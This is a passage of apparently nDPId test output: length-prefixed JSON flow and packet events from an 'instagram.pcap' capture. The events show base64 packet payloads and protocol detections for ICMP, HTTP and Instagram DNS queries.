Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7560000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"}
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"}
00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"}
00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7560000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1436720908523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908523,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICMgTADUANxLxN7ABAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAE="}
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1436720908524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908524,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICINDADUANycOb2MBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAE="}
